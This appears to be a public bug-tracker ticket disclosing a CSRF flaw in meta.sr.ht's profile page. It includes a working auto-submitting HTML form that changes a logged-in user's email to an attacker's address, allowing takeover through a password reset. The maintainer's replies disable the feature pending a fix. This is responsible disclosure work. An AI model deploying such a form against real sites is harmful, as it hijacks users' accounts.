The website is vulnerable to cross-site request forgery (CSRF). Attackers can host the following HTML to force a user into changing their email address to an attacker's email address.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://meta.sr.ht/profile" method="POST">
<input type="hidden" name="email" value="attacker@example.com" />
<input type="hidden" name="url" value="" />
<input type="hidden" name="location" value="" />
<input type="hidden" name="bio" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Once a user that is logged in visits the page, a POST request is made to modify their email address. The attacker then receives a confirmation email and can now perform a password reset. The request above is just an example, but will apply to any state changing request.
Feel free to ping me if you have any other questions.
Resources: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
Thank you. In the future, send security-related issues as an email, not as a public ticket.
Sorry about that. Feel free to remove this ticket then.
I have disabled this feature in meta.sr.ht in production for now, a proper fix will follow shortly.